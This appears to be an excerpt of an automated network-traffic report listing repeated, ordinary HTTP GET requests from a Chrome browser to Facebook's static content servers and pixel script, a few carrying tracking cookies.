    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMX84/yc/l/en_GB/JXFTcdEOgst.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yL/r/2KW45SaLwT9.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/P-sBcB8ct1C.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/udpNONeEc85.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iPiP4/ye/l/en_GB/V4hH0O2u6X-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y9/r/RedpCkzOAc2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iwp84/yz/l/en_GB/yH3NmCM2cz1.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iCwx4/yZ/l/en_GB/HZi4Ht9U6gq.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yE/r/1rYlRSL7ILQ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i5IJ4/yI/l/en_GB/erWoO4SeR1N.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iKG04/yD/l/en_GB/-StUlb9du6-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/P-sBcB8ct1C.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/GcgopRl4mBW.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iYwN4/yd/l/en_GB/lW1EzoN7_Oc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yL/r/2KW45SaLwT9.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMX84/yc/l/en_GB/JXFTcdEOgst.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iO_y4/y8/l/en_GB/81PfJWE3AVG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/EIi3C0sPHQ2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ye/r/GcgopRl4mBW.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i5IJ4/yI/l/en_GB/erWoO4SeR1N.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y9/r/RedpCkzOAc2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iKG04/yD/l/en_GB/-StUlb9du6-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iYwN4/yd/l/en_GB/lW1EzoN7_Oc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/EIi3C0sPHQ2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yH/r/xgVgalBG80z.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/S60_mKfvulW.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/ghLiHO2V3N4.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/ziNkdVTlV4m.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yw/r/Jen4pUvOoRZ.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/o2L07-KO0Bj.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/biz_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/ghLiHO2V3N4.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/community_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yH/r/xgVgalBG80z.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yw/r/Jen4pUvOoRZ.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/biz_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/1668333663438923?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/community_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
